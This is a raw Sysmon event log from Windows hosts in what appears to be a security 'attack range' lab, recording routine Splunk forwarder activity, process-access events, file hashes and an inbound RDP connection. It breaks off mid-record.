354300x8000000000000000218931Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:40.670{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51492-false10.0.1.12-8000- 23542300x8000000000000000218930Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:42.378{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEF99063DE00C33E095E46A178BD2831,SHA256=A27ED6BDD18D0A7651D8BDAB5D9258EBEFB40E17BD8C52E1113E0EA107919F2F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294733Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:39.602{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49169-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000294736Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:43.866{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADEC44EF11697CCF1D3466448A1AD8D4,SHA256=4967297C8A58E551E75E53E8B2C2A0DF3DC94D0B13E94EFB32CEE5DD0792BFDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218933Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:43.550{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B4225633A3E6D3EF41F34DB522301B0,SHA256=5928C3ED89F7F964B30C2FE1B3FC570AA3F568625187477C691B2D4A7CB2CBB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294735Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:43.830{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=3DF0CE546DF0C0C6C794D0A7B2F2244B,SHA256=61A4DA5CFAD10F903B42A30297426E7A72E0DAFB0526944B457BF0A0B5C53E12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294737Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:44.866{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6554A46A3F58F6310D75BE0B6B56E30,SHA256=FE84B031B81A43AF840766371132D98A328FEE937D48D4F0102E440EC75806E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218947Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:44.659{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1490-6216-B404-000000003902}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218946Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:44.659{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218945Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:44.659{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218944Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:44.659{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218943Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:44.659{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218942Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:44.659{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218941Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:44.659{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218940Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:44.659{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218939Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:44.659{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218938Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:44.659{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218937Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:44.659{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1490-6216-B404-000000003902}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218936Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:44.659{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1490-6216-B404-000000003902}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218935Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:44.660{4F8D34B0-1490-6216-B404-000000003902}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218934Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:44.566{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48AAFD85B8A4D76CD2D04685A1107C81,SHA256=95BC897120080466C2472412E4BA808BF1A46BEF0008F02F8EFF2330D00C8B14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294738Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:45.881{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBFBEA32A81253E076E38C7422AE10A3,SHA256=217E88B1EB159AC8A82C5EC87D99CA146BFA952F5258AE854D3991A79460CE2F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218964Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:43.470{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx50303-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000218963Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:45.800{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13C3A19BF739D5A0FC73FBA71313BF8E,SHA256=91E1B761A108F57B8C624C40DA058A44EE61487EB4F4608BA28BD2EEB70F16E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218962Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:45.800{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D50AFA3625CDB47ADE2AC3B86E5F158C,SHA256=6F6525AF4577E9BC1384A0CE846DB95975A53A247BEA4889175125E4BBC80A8A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218961Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:45.441{4F8D34B0-1491-6216-B504-000000003902}35723952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218960Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:45.159{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1491-6216-B504-000000003902}3572C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218959Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:45.159{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218958Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:45.159{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218957Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:45.159{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218956Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:45.159{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218955Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:45.159{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218954Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 